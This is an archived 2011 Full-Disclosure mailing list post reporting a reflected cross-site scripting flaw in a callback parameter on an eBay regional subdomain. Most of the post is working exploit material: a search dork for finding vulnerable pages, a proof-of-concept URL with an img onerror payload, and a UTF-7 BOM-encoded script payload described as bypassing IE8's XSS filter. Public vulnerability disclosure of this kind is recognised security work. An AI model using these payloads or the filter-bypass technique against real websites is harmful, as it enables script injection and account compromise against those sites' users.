lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <AANLkTin8jbuD_qcED-ycdxqAw8rjt0Ztzp=zwhZNMzfK@mail.gmail.com>
Date: Fri, 11 Feb 2011 05:17:57 -0800
From: IEhrepus <5up3rh3i@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: ebay.com callback xss vul

"site:ebay.com inurl:callback" on google.com

and get this url:

http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?

then
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E

ofcourse u can use 《xss attacks through utf7-BOM string
injection<http://seclists.org/fulldisclosure/2011/Feb/199>》
to bypass ie8 xss filters

http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=%2B%2Fv811..%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-xcsxxadas



--superhei from http://www.80vul.com

--ad--
About Ph4nt0m Webzine

Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions
.mailto:root_at_ph4nt0m.org <root_at_ph4nt0m.org> pls.thank you!

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ